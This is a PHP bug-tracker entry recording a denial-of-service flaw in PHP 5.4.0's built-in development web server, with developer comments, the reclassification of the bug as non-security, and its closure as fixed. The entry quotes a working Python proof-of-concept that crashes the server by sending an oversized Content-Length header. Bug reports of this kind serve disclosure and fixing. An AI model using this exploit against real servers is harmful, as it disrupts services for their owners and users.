PHP :: Bug #61509 :: In-built webserver denial-of-service

Bug #61509

In-built webserver denial-of-service

Submitted:

2012-03-26 12:37 UTC

Modified:

2013-08-01 22:19 UTC

Votes:	4
Avg. Score:	3.0 ± 2.0
Reproduced:	1 of 2 (50.0%)
Same Version:	1 (100.0%)
Same OS:	1 (100.0%)

From:

pajoye@php.net

Assigned:

yohgaki (profile)

Status:

Closed

Package:

CGI/CLI related

PHP Version:

5.4.0

OS:

Private report:

CVE-ID:

None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	pajoye@php.net
New email:
PHP Version:		OS:

New Comment:

[2012-03-26 12:37 UTC] pajoye@php.net

Description:
------------
PHP version 5.4.0 built-in web server denial of service proof of concept exploit.


via http://packetstormsecurity.org/files/111163/php540-dos.txt

Test script:
---------------
#!/usr/bin/python
 
# Title:      PHP 5.4.0 Built-in Web Server DoS PoC
# Date:       16 March 2012
# Author:     ls (contact@kaankivilcim.com)
# Reference:  https://bugs.php.net/bug.php?id=61461
# Comments:   Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV
 
# The value of the Content-Length header is passed directly to a pemalloc() call in sapi/cli/php_cli_server.c
# on line 1538. The inline function defined within Zend/zend_alloc.h for malloc() will fail, and will terminate
# the process with the error message "Out of memory".
#
# 1537 if (!client->request.content) {
# 1538   client->request.content = pemalloc(parser->content_length, 1);
# 1539   client->request.content_len = 0;
# 1540 }
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1:80
# Document root is /tmp
# Press Ctrl-C to quit.
# Out of memory
 
import socket, sys
 
target = "127.0.0.1"
port   = 80;
 
request  = "POST / HTTP/1.1\n"
request += "Content-Type: application/x-www-form-urlencoded\n"
request += "Content-Length: 2147483638\n\n" # <-- Choose size larger than the available memory on target
request += "A=B\n\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
 
print "[+] Sending HTTP request. Check for crash on target."
 
s.send(request)
s.close()

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2012-03-27 20:03 UTC] sixd@php.net

-Summary: DOS +Summary: In-built webserver denial-of-service

[2012-03-27 20:03 UTC] sixd@php.net

For the record, note the comment in the documentation:
"This web server is designed for developmental purposes only, and should not be 
used in production."

[2012-03-27 20:06 UTC] stas@php.net

-Type: Security +Type: Bug

[2012-03-27 20:07 UTC] stas@php.net

Built-in webserver is a development module, I see no reason to classify bugs on 
it as security.

[2013-08-01 22:19 UTC] yohgaki@php.net

-Status: Open +Status: Closed -Assigned To: +Assigned To: yohgaki

[2013-08-01 22:19 UTC] yohgaki@php.net

Current code compare the length of parsed data and ignore as invalid request.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Sat May 03 18:01:30 2025 UTC